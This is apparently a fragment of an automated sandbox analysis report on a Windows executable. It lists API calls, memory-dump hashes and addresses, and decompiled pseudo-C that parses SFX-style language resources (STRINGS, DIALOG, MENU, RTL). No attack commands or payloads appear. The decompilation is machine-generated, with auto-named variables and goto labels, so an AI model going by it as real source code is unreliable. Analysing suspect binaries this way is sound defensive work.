    0x0084becf
    0x00000000
    0x00000000
    0x00000000
    0x0084bf2c
    0x0084bf2c
    0x0084bf2f
    0x0084bf2f
    0x0084bf34
    0x0084bf36
    0x0084bf38
    0x0084bf38
    0x0084bf3a
    0x0084bf3a
    0x00000000
    0x0084be52
    0x0084be59
    0x0084be65
    0x0084be6b
    0x0084be6c
    0x0084be6d
    0x0084be72
    0x0084be75
    0x0084be77
    0x0084be7d
    0x0084be7f
    0x0084be8d
    0x0084be92
    0x0084be93
    0x0084be93
    0x0084bf3d
    0x0084bf3d
    0x0084bf45
    0x0084bf4a
    0x0084bf4c
    0x0084bf4d
    0x0084bf53
    0x0084bf54
    0x0084bf5a
    0x0084bf5b
    0x0084bf5b
    0x0084bf60
    0x0084bf61
    0x0084bf67
    0x0084bf68
    0x0084bf6e
    0x0084bf6f
    0x0084bf74
    0x0084bf7c
    0x0084bf88
    0x0084bf88
    0x0084bf95
    0x0084bf9a
    0x0084bfa2
    0x0084bfac
    0x0084bfb9
    0x0084bfc0
    0x0084bfc0
    0x0084bfcc
    0x0084bfd3
    0x0084bfd8
    0x0084bfe0
    0x0084bfe6
    0x0084bfe7
    0x0084bfe8
    0x0084bfea
    0x0084bfea
    0x0084bfff
    0x0084c004
    0x0084c010
    0x0084c012
    0x0084c023
    0x0084c030
    0x00000000
    0x0084c014
    0x0084c01f
    0x0084c021
    0x0084c035
    0x0084c035
    0x0084c037
    0x0084c03d
    0x0084c043
    0x0084c051
    0x0084c056
    0x0084c057
    0x0084c05f
    0x0084c064
    0x0084c06b
    0x0084c071
    0x0084c073
    0x0084c079
    0x0084c07f
    0x0084c081
    0x0084c08a
    0x0084c08d
    0x0084c08f
    0x0084c098
    0x0084c09b
    0x0084c0a1
    0x0084c0a4
    0x0084c0ad
    0x0084c0bc
    0x0084c0c1
    0x0084c0c9
    0x0084c0cb
    0x0084c0cc
    0x0084c0d2
    0x0084c0d3
    0x0084c0d5
    0x0084c0da
    0x0084c0da
    0x00000000
    0x0084c0c9
    0x00000000
    0x0084c021
    0x0084c012
    0x00000000
    0x0084c0e2
    0x0084c0e5
    0x0084c0e7
    0x0084c0e7
    0x00000000
    0x00000000
    0x0084bb13
    0x0084bb1b
    0x0084bb21
    0x0084bb24
    0x0084bb48
    0x0084bb26
    0x0084bb26
    0x0084bb29
    0x0084bb3c
    0x0084bb2b
    0x0084bb2b
    0x0084bb2d
    0x0084bb32
    0x0084bb32
    0x0084bb29
    0x00000000
    0x00000000
    0x0084bb8c
    0x0084bb8d
    0x0084bb92
    0x0084bb92
    0x0084bb92
    0x0084bb95
    0x0084bb9a
    0x0084bba0
    0x0084bba0
    0x0084bba6
    0x0084bbac
    0x0084bbac
    0x00000000
    0x00000000
    0x0084b585
    0x0084b587
    0x0084b58c
    0x0084b592
    0x0084b595
    0x00000000
    0x0084b597
    0x0084b597
    0x00000000
    0x0084b597
    0x0084c0ee
    0x0084c0ee
    0x0084c0f3
    0x0084c0f7
    0x0084c0fb
    0x0084c102
    0x0084c109
    0x0084c10c
    0x0084c111
    0x0084c114
    0x0084c117
    0x0084c121

    APIs
    • __EH_prolog.LIBCMT ref: 0084B527
      • Part of subcall function 0084A1C9: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0084A291
    • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,0084AE3A,?,00000000), ref: 0084B65C
    • GetFileAttributesW.KERNEL32(?), ref: 0084B716
    • DeleteFileW.KERNEL32(?), ref: 0084B724
    • SetWindowTextW.USER32(?,?), ref: 0084B86D
    • _wcsrchr.LIBVCRUNTIME ref: 0084B9F7
    • GetDlgItem.USER32(?,00000066), ref: 0084BA32
    • SetWindowTextW.USER32(00000000,?), ref: 0084BA42
    • SendMessageW.USER32(00000000,00000143,00000000,00879602), ref: 0084BA56
    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0084BA7F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
    • API String ID: 3676479488-312220925
    • Opcode ID: 94ecad411c6790aca22fae9bbf64dd84596c6f63bbd845db5f9065e78d7c9510
    • Instruction ID: 067c600dddbd3572eef5071024db9733dc6cd1711eeeacadb34d1b6ec960df82
    • Opcode Fuzzy Hash: 94ecad411c6790aca22fae9bbf64dd84596c6f63bbd845db5f9065e78d7c9510
    • Instruction Fuzzy Hash: CDE15C7290021DAAEF24ABA4DD85DEE777CFB44350F0041A6F919E7051EF749B848BA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E0083D019(signed int __ecx, void* __edx) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				signed int _t196;
    				void* _t197;
    				WCHAR* _t198;
    				void* _t203;
    				signed int _t212;
    				signed int _t215;
    				signed int _t218;
    				signed int _t228;
    				void* _t229;
    				void* _t232;
    				signed int _t235;
    				signed int _t237;
    				signed int _t238;
    				signed int _t239;
    				signed int _t244;
    				signed int _t248;
    				signed int _t262;
    				signed int _t267;
    				signed int _t268;
    				signed int _t270;
    				signed int _t272;
    				signed int _t273;
    				void* _t274;
    				signed int _t279;
    				char* _t280;
    				signed int _t284;
    				short _t287;
    				void* _t288;
    				signed int _t294;
    				signed int _t299;
    				void* _t302;
    				void* _t304;
    				void* _t307;
    				signed int _t316;
    				unsigned int _t328;
    				signed int _t330;
    				unsigned int _t333;
    				signed int _t336;
    				void* _t343;
    				signed int _t348;
    				signed int _t351;
    				signed int _t352;
    				signed int _t357;
    				signed int _t361;
    				void* _t370;
    				signed int _t372;
    				signed int _t373;
    				void* _t374;
    				void* _t375;
    				intOrPtr* _t376;
    				signed int _t377;
    				signed int _t380;
    				signed int _t381;
    				signed int _t382;
    				signed int _t383;
    				signed int _t384;
    				signed int _t387;
    				signed int _t389;
    				signed int* _t390;
    				void* _t391;
    				void* _t392;
    				void* _t394;
    				void* _t398;
    				void* _t399;
    
    				_t370 = __edx;
    				_t392 = _t391 - 0x6c;
    				E0084D8C4(E00861463, __ecx);
    				E0084D9C0();
    				_t196 = 0x5c;
    				_push(0x427c);
    				_push(_t390[0x1e]);
    				_t387 = __ecx;
    				_t390[0x11] = _t196;
    				_t390[0x12] = __ecx;
    				_t197 = E00850BB8(__ecx);
    				_t316 = 0;
    				_t396 = _t197;
    				_t198 = _t390 - 0x1264;
    				if(_t197 != 0) {
    					E0083FAE7(_t198, _t390[0x1e], 0x800);
    				} else {
    					GetModuleFileNameW(0, _t198, 0x800);
    					 *((short*)(E0083B9E0(_t396, _t390 - 0x1264))) = 0;
    					E0083FABF(_t396, _t390 - 0x1264, _t390[0x1e], 0x800);
    				}
    				E008394D4(_t390 - 0x2288);
    				_push(4);
    				 *(_t390 - 4) = _t316;
    				_push(_t390 - 0x1264);
    				if(E0083980C(_t390 - 0x2288, _t387) == 0) {
    					L57:
    					_t203 = E00839506(_t390 - 0x2288); // executed
    					 *[fs:0x0] =  *((intOrPtr*)(_t390 - 0xc));
    					return _t203;
    				} else {
    					_t380 = _t316;
    					_t398 =  *0x86d5f4 - _t380; // 0x63
    					if(_t398 <= 0) {
    						L7:
    						E00855070(_t316, _t380, _t387,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E0083CCB4);
    						E00855070(_t316, _t380, _t387,  *((intOrPtr*)(_t387 + 0x14)),  *((intOrPtr*)(_t387 + 0x18)), 4, E0083CC19);
    						_t394 = _t392 + 0x20;
    						_t390[0x1e] = _t316;
    						_t381 = _t380 | 0xffffffff;
    						_t390[0x16] = _t316;
    						_t390[0x19] = _t381;
    						while(_t381 == 0xffffffff) {
    							_t390[0x1b] = E00839BFB();
    							_t294 = E00839A1D(_t370, _t390 - 0x4288, 0x2000);
    							_t390[0x17] = _t294;
    							_t384 = _t316;
    							_t25 = _t294 - 0x10; // -16
    							_t361 = _t25;
    							_t390[0x15] = _t361;
    							if(_t361 < 0) {
    								L25:
    								_t295 = _t390[0x1b];
    								_t381 = _t390[0x19];
    								L26:
    								E00839AF0(_t390 - 0x2288, _t390, _t295 + _t390[0x17] + 0xfffffff0, _t316, _t316);
    								_t299 = _t390[0x16] + 1;
    								_t390[0x16] = _t299;
    								__eflags = _t299 - 0x100;
    								if(_t299 < 0x100) {
    									continue;
    								}
    								__eflags = _t381 - 0xffffffff;
    								if(_t381 == 0xffffffff) {
    									goto L57;
    								}
    								break;
    							}
    							L10:
    							while(1) {
    								if( *((char*)(_t390 + _t384 - 0x4288)) != 0x2a ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x2a) {
    									L14:
    									_t370 = 0x2a;
    									if( *((intOrPtr*)(_t390 + _t384 - 0x4288)) != _t370) {
    										L18:
    										if( *((char*)(_t390 + _t384 - 0x4288)) != 0x52 ||  *((char*)(_t390 + _t384 - 0x4287)) != 0x61) {
    											L21:
    											_t384 = _t384 + 1;
    											if(_t384 > _t390[0x15]) {
    												goto L25;
    											}
    											_t294 = _t390[0x17];
    											continue;
    										} else {
    											_t302 = E008554A0(_t390 - 0x4286 + _t384, 0x862620, 4);
    											_t394 = _t394 + 0xc;
    											if(_t302 == 0) {
    												goto L57;
    											}
    											goto L21;
    										}
    									}
    									_t366 = _t390 - 0x4284 + _t384;
    									if( *((intOrPtr*)(_t390 - 0x4284 + _t384 - 2)) == _t370 && _t384 <= _t294 + 0xffffffe0) {
    										_t304 = E00854DE5(_t366, L"*messages***", 0xb);
    										_t394 = _t394 + 0xc;
    										if(_t304 == 0) {
    											_t390[0x1e] = 1;
    											goto L24;
    										}
    									}
    									goto L18;
    								} else {
    									_t307 = E008554A0(_t390 - 0x4286 + _t384, "*messages***", 0xb);
    									_t394 = _t394 + 0xc;
    									if(_t307 == 0) {
    										L24:
    										_t295 = _t390[0x1b];
    										_t381 = _t384 + _t390[0x1b];
    										_t390[0x19] = _t381;
    										goto L26;
    									}
    									_t294 = _t390[0x17];
    									goto L14;
    								}
    							}
    						}
    						asm("cdq");
    						E00839AF0(_t390 - 0x2288, _t390, _t381, _t370, _t316);
    						_push(0x200002);
    						_t382 = E00852BB3(_t390 - 0x2288);
    						_t390[0x1a] = _t382;
    						__eflags = _t382;
    						if(_t382 == 0) {
    							goto L57;
    						}
    						_t328 = E00839A1D(_t370, _t382, 0x200000);
    						_t390[0x19] = _t328;
    						__eflags = _t390[0x1e];
    						if(_t390[0x1e] == 0) {
    							_push(2 + _t328 * 2);
    							_t212 = E00852BB3(_t328);
    							_t390[0x1e] = _t212;
    							__eflags = _t212;
    							if(_t212 == 0) {
    								goto L57;
    							}
    							_t330 = _t390[0x19];
    							 *(_t330 + _t382) = _t316;
    							__eflags = _t330 + 1;
    							E00841006(_t382, _t212, _t330 + 1);
    							L00852BAE(_t382);
    							_t382 = _t390[0x1e];
    							_t333 = _t390[0x19];
    							_t390[0x1a] = _t382;
    							L33:
    							_t215 = 0x100000;
    							__eflags = _t333 - 0x100000;
    							if(_t333 <= 0x100000) {
    								_t215 = _t333;
    							}
    							 *((short*)(_t382 + _t215 * 2)) = 0;
    							E0083FA8C(_t390 - 0xd4, 0x862628, 0x64);
    							_push(0x20002);
    							_t218 = E00852BB3(0);
    							_t390[0x1b] = _t218;
    							__eflags = _t218;
    							if(_t218 != 0) {
    								__eflags = _t390[0x19];
    								_t336 = _t316;
    								_t371 = _t316;
    								_t390[0x1e] = _t336;
    								 *_t390 = _t316;
    								_t383 = _t316;
    								_t390[0x17] = _t316;
    								if(_t390[0x19] <= 0) {
    									L54:
    									E0083CB85(_t387, _t371, _t390, _t218, _t336);
    									L00852BAE(_t390[0x1a]);
    									L00852BAE(_t390[0x1b]);
    									__eflags =  *((intOrPtr*)(_t387 + 0x2c)) - _t316;
    									if( *((intOrPtr*)(_t387 + 0x2c)) <= _t316) {
    										L56:
    										 *0x870124 =  *((intOrPtr*)(_t387 + 0x28));
    										E00855070(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x3c)),  *((intOrPtr*)(_t387 + 0x40)), 4, E0083CD5A);
    										E00855070(_t316, _t383, _t387,  *((intOrPtr*)(_t387 + 0x50)),  *((intOrPtr*)(_t387 + 0x54)), 4, E0083CD89);
    										goto L57;
    									} else {
    										goto L55;
    									}
    									do {
    										L55:
    										E00843406(_t387 + 0x3c, _t371, _t316);
    										E00843406(_t387 + 0x50, _t371, _t316);
    										_t316 = _t316 + 1;
    										__eflags = _t316 -  *((intOrPtr*)(_t387 + 0x2c));
    									} while (_t316 <  *((intOrPtr*)(_t387 + 0x2c)));
    									goto L56;
    								}
    								_t390[0x14] = 0xd;
    								_t390[0x13] = 0xa;
    								_t390[0x15] = 9;
    								do {
    									_t228 = _t390[0x1a];
    									__eflags = _t383;
    									if(_t383 == 0) {
    										L80:
    										_t372 =  *(_t228 + _t383 * 2) & 0x0000ffff;
    										_t383 = _t383 + 1;
    										__eflags = _t372;
    										if(_t372 == 0) {
    											break;
    										}
    										__eflags = _t372 - _t390[0x11];
    										if(_t372 != _t390[0x11]) {
    											_t229 = 0xd;
    											__eflags = _t372 - _t229;
    											if(_t372 == _t229) {
    												L99:
    												E0083CB85(_t387, _t390[0x17], _t390, _t390[0x1b], _t336);
    												 *_t390 = _t316;
    												_t336 = _t316;
    												_t390[0x17] = _t316;
    												L98:
    												_t390[0x1e] = _t336;
    												goto L52;
    											}
    											_t232 = 0xa;
    											__eflags = _t372 - _t232;
    											if(_t372 == _t232) {
    												goto L99;
    											}
    											L96:
    											__eflags = _t336 - 0x10000;
    											if(_t336 >= 0x10000) {
    												goto L52;
    											}
    											 *(_t390[0x1b] + _t336 * 2) = _t372;
    											_t336 = _t336 + 1;
    											__eflags = _t336;
    											goto L98;
    										}
    										__eflags = _t336 - 0x10000;
    										if(_t336 >= 0x10000) {
    											goto L52;
    										}
    										_t235 = ( *(_t228 + _t383 * 2) & 0x0000ffff) - 0x22;
    										__eflags = _t235;
    										if(_t235 == 0) {
    											_push(0x22);
    											L93:
    											_pop(_t377);
    											 *(_t390[0x1b] + _t336 * 2) = _t377;
    											_t336 = _t336 + 1;
    											_t390[0x1e] = _t336;
    											_t383 = _t383 + 1;
    											goto L52;
    										}
    										_t237 = _t235 - 0x3a;
    										__eflags = _t237;
    										if(_t237 == 0) {
    											_push(0x5c);
    											goto L93;
    										}
    										_t238 = _t237 - 0x12;
    										__eflags = _t238;
    										if(_t238 == 0) {
    											_push(0xa);
    											goto L93;
    										}
    										_t239 = _t238 - 4;
    										__eflags = _t239;
    										if(_t239 == 0) {
    											_push(0xd);
    											goto L93;
    										}
    										__eflags = _t239 != 0;
    										if(_t239 != 0) {
    											goto L96;
    										}
    										_push(9);
    										goto L93;
    									}
    									_t373 =  *(_t228 + _t383 * 2 - 2) & 0x0000ffff;
    									__eflags = _t373 - _t390[0x14];
    									if(_t373 == _t390[0x14]) {
    										L42:
    										_t343 = 0x3a;
    										__eflags =  *(_t228 + _t383 * 2) - _t343;
    										if( *(_t228 + _t383 * 2) != _t343) {
    											L71:
    											_t390[0x18] = _t228 + _t383 * 2;
    											_t244 = E0083F950( *(_t228 + _t383 * 2) & 0x0000ffff);
    											__eflags = _t244;
    											if(_t244 == 0) {
    												L79:
    												_t336 = _t390[0x1e];
    												_t228 = _t390[0x1a];
    												goto L80;
    											}
    											E0083FAE7(_t390 - 0x264, _t390[0x18], 0x64);
    											_t248 = E00854E62(_t390 - 0x264, L" \t,");
    											_t390[0x18] = _t248;
    											__eflags = _t248;
    											if(_t248 == 0) {
    												goto L79;
    											}
    											 *_t248 = 0;
    											E00841222(_t390 - 0x264, _t390 - 0x138, 0x64);
    											E0083FA8C(_t390 - 0x70, _t390 - 0xd4, 0x64);
    											E0083FA65(__eflags, _t390 - 0x70, _t390 - 0x138, 0x64);
    											E0083FA8C(_t390, _t390 - 0x70, 0x32);
    											_t262 = E00854EB6(_t316, 0, _t383, _t387, _t390 - 0x70,  *_t387,  *((intOrPtr*)(_t387 + 4)), 4, E0083CD3F);
    											_t394 = _t394 + 0x14;
    											__eflags = _t262;
    											if(_t262 != 0) {
    												_t268 =  *_t262 * 0xc;
    												__eflags = _t268;
    												_t167 = _t268 + 0x86d150; // 0x28b64ee0
    												_t390[0x17] =  *_t167;
    											}
    											_t383 = _t383 + (_t390[0x18] - _t390 - 0x264 >> 1) + 1;
    											__eflags = _t383;
    											_t267 = _t390[0x1a];
    											_t374 = 0x20;
    											while(1) {
    												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
    												__eflags = _t348 - _t374;
    												if(_t348 == _t374) {
    													goto L78;
    												}
    												L77:
    												_t174 =  &(_t390[0x15]); // 0x9
    												__eflags = _t348 -  *_t174;
    												if(_t348 !=  *_t174) {
    													L51:
    													_t336 = _t390[0x1e];
    													goto L52;
    												}
    												L78:
    												_t383 = _t383 + 1;
    												_t348 =  *(_t267 + _t383 * 2) & 0x0000ffff;
    												__eflags = _t348 - _t374;
    												if(_t348 == _t374) {
    													goto L78;
    												}
    												goto L77;
    											}
    										}
    										_t389 = _t390[0x1a];
    										_t270 = _t228 | 0xffffffff;
    										__eflags = _t270;
    										_t390[0x16] = _t270;
    										_t390[0xd] = L"STRINGS";
    										_t390[0xe] = L"DIALOG";
    										_t390[0xf] = L"MENU";
    										_t390[0x10] = L"DIRECTION";
    										_t390[0x18] = _t316;
    										do {
    											_t390[0x18] = E00852B93( *((intOrPtr*)(_t390 + 0x34 + _t316 * 4)));
    											_t272 = E00854DE5(_t389 + 2 + _t383 * 2,  *((intOrPtr*)(_t390 + 0x34 + _t316 * 4)), _t271);
    											_t394 = _t394 + 0x10;
    											_t375 = 0x20;
    											__eflags = _t272;
    											if(_t272 != 0) {
    												L47:
    												_t273 = _t390[0x16];
    												goto L48;
    											}
    											_t357 = _t390[0x18] + _t383;
    											__eflags =  *((intOrPtr*)(_t389 + 2 + _t357 * 2)) - _t375;
    											if( *((intOrPtr*)(_t389 + 2 + _t357 * 2)) > _t375) {
    												goto L47;
    											}
    											_t273 = _t316;
    											_t383 = _t357 + 1;
    											_t390[0x16] = _t273;
    											L48:
    											_t316 = _t316 + 1;
    											__eflags = _t316 - 4;
    										} while (_t316 < 4);
    										_t387 = _t390[0x12];
    										_t316 = 0;
    										__eflags = _t273;
    										if(__eflags != 0) {
    											_t228 = _t390[0x1a];
    											if(__eflags <= 0) {
    												goto L71;
    											} else {
    												goto L59;
    											}
    											while(1) {
    												L59:
    												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
    												__eflags = _t351 - _t375;
    												if(_t351 == _t375) {
    													goto L61;
    												}
    												L60:
    												_t132 =  &(_t390[0x15]); // 0x9
    												__eflags = _t351 -  *_t132;
    												if(_t351 !=  *_t132) {
    													_t376 = _t228 + _t383 * 2;
    													_t390[0x18] = _t316;
    													_t274 = 0x20;
    													_t352 = _t316;
    													__eflags =  *_t376 - _t274;
    													if( *_t376 <= _t274) {
    														L66:
    														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = 0;
    														E00841222(_t390 - 0x19c, _t390 - 0x70, 0x64);
    														_t383 = _t383 + _t390[0x18];
    														_t279 = _t390[0x16];
    														__eflags = _t279 - 3;
    														if(_t279 != 3) {
    															__eflags = _t279 - 1;
    															_t280 = "$%s:";
    															if(_t279 != 1) {
    																_t280 = "@%s:";
    															}
    															E0083DA25(_t390 - 0xd4, 0x64, _t280, _t390 - 0x70);
    															_t394 = _t394 + 0x10;
    														} else {
    															_t284 = E00852BC9(_t390 - 0x19c, _t390 - 0x19c, L"RTL");
    															asm("sbb al, al");
    															 *((char*)(_t387 + 0x64)) =  ~_t284 + 1;
    														}
    														goto L51;
    													} else {
    														goto L63;
    													}
    													while(1) {
    														L63:
    														__eflags = _t352 - 0x63;
    														if(_t352 >= 0x63) {
    															break;
    														}
    														_t287 =  *_t376;
    														_t376 = _t376 + 2;
    														 *((short*)(_t390 + _t352 * 2 - 0x19c)) = _t287;
    														_t352 = _t352 + 1;
    														_t288 = 0x20;
    														__eflags =  *_t376 - _t288;
    														if( *_t376 > _t288) {
    															continue;
    														}
    														break;
    													}
    													_t390[0x18] = _t352;
    													goto L66;
    												}
    												L61:
    												_t383 = _t383 + 1;
    												L59:
    												_t351 =  *(_t228 + _t383 * 2) & 0x0000ffff;
    												__eflags = _t351 - _t375;
    												if(_t351 == _t375) {
    													goto L61;
    												}
    												goto L60;
    											}
    										}
    										E0083FA8C(_t390 - 0xd4, 0x862628, 0x64);
    										goto L51;
    									}
    									__eflags = _t373 - _t390[0x13];
    									if(_t373 != _t390[0x13]) {
    										goto L80;
    									}
    									goto L42;
    									L52:
    									__eflags = _t383 - _t390[0x19];
    								} while (_t383 < _t390[0x19]);
    								_t218 = _t390[0x1b];
    								_t371 = _t390[0x17];
    								goto L54;
    							} else {
    								L00852BAE(_t382);
    								goto L57;
    							}
    						}
    						_t333 = _t328 >> 1;
    						_t390[0x19] = _t333;
    						goto L33;
    					} else {
    						goto L5;
    					}
    					do {
    						L5:
    						E00843406(_t387, _t370, _t380);
    						E00843406(_t387 + 0x14, _t370, _t380);
    						_t380 = _t380 + 1;
    						_t399 = _t380 -  *0x86d5f4; // 0x63
    					} while (_t399 < 0);
    					_t316 = 0;
    					goto L7;
    				}
    			}







































































    0x0083d019
    0x0083d01a
    0x0083d022
    0x0083d02c
    0x0083d036
    0x0083d037
    0x0083d038
    0x0083d03b
    0x0083d03d
    0x0083d040
    0x0083d043
    0x0083d049
    0x0083d04b
    0x0083d04e
    0x0083d054
    0x0083d090
    0x0083d056
    0x0083d05e
    0x0083d076
    0x0083d080
    0x0083d080
    0x0083d09b
    0x0083d0a0
    0x0083d0a8
    0x0083d0ab
    0x0083d0b9
    0x0083d476
    0x0083d47c
    0x0083d487
    0x0083d492
    0x0083d0bf
    0x0083d0bf
    0x0083d0c1
    0x0083d0c7
    0x0083d0e5
    0x0083d0f1
    0x0083d103
    0x0083d108
    0x0083d10b
    0x0083d10e
    0x0083d111
    0x0083d114
    0x0083d117
    0x0083d12b
    0x0083d140
    0x0083d145
    0x0083d148
    0x0083d14a
    0x0083d14a
    0x0083d14d
    0x0083d152
    0x0083d211
    0x0083d211
    0x0083d214
    0x0083d217
    0x0083d228
    0x0083d230
    0x0083d231
    0x0083d234
    0x0083d239
    0x00000000
    0x00000000
    0x0083d23f
    0x0083d242
    0x00000000
    0x00000000
    0x00000000
    0x0083d242
    0x00000000
    0x0083d158
    0x0083d160
    0x0083d18b
    0x0083d18d
    0x0083d196
    0x0083d1c1
    0x0083d1c9
    0x0083d1f5
    0x0083d1f5
    0x0083d1f9
    0x00000000
    0x00000000
    0x0083d1fb
    0x00000000
    0x0083d1d5
    0x0083d1e5
    0x0083d1ea
    0x0083d1ef
    0x00000000
    0x00000000
    0x00000000
    0x0083d1ef
    0x0083d1c9
    0x0083d19e
    0x0083d1a4
    0x0083d1b5
    0x0083d1ba
    0x0083d1bf
    0x0083d203
    0x00000000
    0x0083d203
    0x0083d1bf
    0x00000000
    0x0083d16c
    0x0083d17c
    0x0083d181
    0x0083d186
    0x0083d207
    0x0083d207
    0x0083d20a
    0x0083d20c
    0x00000000
    0x0083d20c
    0x0083d188
    0x00000000
    0x0083d188
    0x0083d160
    0x0083d158
    0x0083d251
    0x0083d254
    0x0083d259
    0x0083d263
    0x0083d265
    0x0083d269
    0x0083d26b
    0x00000000
    0x00000000
    0x0083d282
    0x0083d287
    0x0083d28a
    0x0083d28c
    0x0083d29c
    0x0083d29d
    0x0083d2a2
    0x0083d2a6
    0x0083d2a8
    0x00000000
    0x00000000
    0x0083d2ae
    0x0083d2b1
    0x0083d2b4
    0x0083d2b8
    0x0083d2be
    0x0083d2c3
    0x0083d2c7
    0x0083d2ca
    0x0083d2cd
    0x0083d2cd
    0x0083d2d2
    0x0083d2d4
    0x0083d2d6
    0x0083d2d6
    0x0083d2dc
    0x0083d2ec
    0x0083d2f1
    0x0083d2f6
    0x0083d2fb
    0x0083d2ff
    0x0083d301
    0x0083d30f
    0x0083d313
    0x0083d315
    0x0083d317
    0x0083d31a
    0x0083d31d
    0x0083d31f
    0x0083d322
    0x0083d40a
    0x0083d413
    0x0083d41b
    0x0083d423
    0x0083d42a
    0x0083d42d
    0x0083d447
    0x0083d454
    0x0083d45c
    0x0083d46e
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0083d42f
    0x0083d42f
    0x0083d433
    0x0083d43c
    0x0083d441
    0x0083d442
    0x0083d442
    0x00000000
    0x0083d42f
    0x0083d328
    0x0083d32f
    0x0083d336
    0x0083d33d
    0x0083d33d
    0x0083d340
    0x0083d342
    0x0083d63e
    0x0083d63e
    0x0083d642
    0x0083d643
    0x0083d646
    0x00000000
    0x00000000
    0x0083d64c
    0x0083d650
    0x0083d6a2
    0x0083d6a3
    0x0083d6a6
    0x0083d6cc
    0x0083d6d9
    0x0083d6de
    0x0083d6e1
    0x0083d6e3
    0x0083d6c4
    0x0083d6c4
    0x00000000
    0x0083d6c4
    0x0083d6aa
    0x0083d6ab
    0x0083d6ae
    0x00000000
    0x00000000
    0x0083d6b0
    0x0083d6b0
    0x0083d6b6
    0x00000000
    0x00000000
    0x0083d6bf
    0x0083d6c3
    0x0083d6c3
    0x00000000
    0x0083d6c3
    0x0083d652
    0x0083d658
    0x00000000
    0x00000000
    0x0083d662
    0x0083d662
    0x0083d665
    0x0083d68c
    0x0083d68e
    0x0083d691
    0x0083d692
    0x0083d696
    0x0083d697
    0x0083d69a
    0x00000000
    0x0083d69a
    0x0083d667
    0x0083d667
    0x0083d66a
    0x0083d688
    0x00000000
    0x0083d688
    0x0083d66c
    0x0083d66c
    0x0083d66f
    0x0083d684
    0x00000000
    0x0083d684
    0x0083d671
    0x0083d671
    0x0083d674
    0x0083d680
    0x00000000
    0x0083d680
    0x0083d677
    0x0083d67a
    0x00000000
    0x00000000
    0x0083d67c
    0x00000000
    0x0083d67c
    0x0083d348
    0x0083d34d
    0x0083d351
    0x0083d35d
    0x0083d35f
    0x0083d360
    0x0083d364
    0x0083d551
    0x0083d554
    0x0083d55b
    0x0083d560
    0x0083d562
    0x0083d638
    0x0083d638
    0x0083d63b
    0x00000000
    0x0083d63b
    0x0083d574
    0x0083d585
    0x0083d58a
    0x0083d58f
    0x0083d591
    0x00000000
    0x00000000
    0x0083d599
    0x0083d5ac
    0x0083d5be
    0x0083d5d0
    0x0083d5df
    0x0083d5f4
    0x0083d5f9
    0x0083d5fc
    0x0083d5fe
    0x0083d600
    0x0083d600
    0x0083d603
    0x0083d609
    0x0083d609
    0x0083d61c
    0x0083d61c
    0x0083d61e
    0x0083d621
    0x0083d622
    0x0083d622
    0x0083d626
    0x0083d629
    0x00000000
    0x00000000
    0x0083d62b
    0x0083d62b
    0x0083d62b
    0x0083d62f
    0x0083d3f8
    0x0083d3f8
    0x00000000
    0x0083d3f8
    0x0083d635
    0x0083d635
    0x0083d622
    0x0083d626
    0x0083d629
    0x00000000
    0x00000000
    0x00000000
    0x0083d629
    0x0083d622
    0x0083d36a
    0x0083d36d
    0x0083d36d
    0x0083d370
    0x0083d373
    0x0083d37a
    0x0083d381
    0x0083d388
    0x0083d38f
    0x0083d392
    0x0083d3a3
    0x0083d3aa
    0x0083d3af
    0x0083d3b4
    0x0083d3b5
    0x0083d3b7
    0x0083d3cf
    0x0083d3cf
    0x00000000
    0x0083d3cf
    0x0083d3bc
    0x0083d3be
    0x0083d3c3
    0x00000000
    0x00000000
    0x0083d3c5
    0x0083d3c7
    0x0083d3ca
    0x0083d3d2
    0x0083d3d2
    0x0083d3d3
    0x0083d3d3
    0x0083d3d8
    0x0083d3db
    0x0083d3dd
    0x0083d3df
    0x0083d495
    0x0083d498
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0083d49e
    0x0083d49e
    0x0083d49e
    0x0083d4a2
    0x0083d4a5
    0x00000000
    0x00000000
    0x0083d4a7
    0x0083d4a7
    0x0083d4a7
    0x0083d4ab
    0x0083d4b0
    0x0083d4b3
    0x0083d4b8
    0x0083d4b9
    0x0083d4bb
    0x0083d4be
    0x0083d4df
    0x0083d4e1
    0x0083d4f6
    0x0083d4fb
    0x0083d4fe
    0x0083d501
    0x0083d504
    0x0083d527
    0x0083d52a
    0x0083d52f
    0x0083d531
    0x0083d531
    0x0083d544
    0x0083d549
    0x0083d506
    0x0083d512
    0x0083d51a
    0x0083d51f
    0x0083d51f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0083d4c0
    0x0083d4c0
    0x0083d4c0
    0x0083d4c3
    0x00000000
    0x00000000
    0x0083d4c5
    0x0083d4c8
    0x0083d4cb
    0x0083d4d3
    0x0083d4d6
    0x0083d4d7
    0x0083d4da
    0x00000000
    0x00000000
    0x00000000
    0x0083d4da
    0x0083d4dc
    0x00000000
    0x0083d4dc
    0x0083d4ad
    0x0083d4ad
    0x0083d49e
    0x0083d49e
    0x0083d4a2
    0x0083d4a5
    0x00000000
    0x00000000
    0x00000000
    0x0083d4a5
    0x0083d49e
    0x0083d3f3
    0x00000000
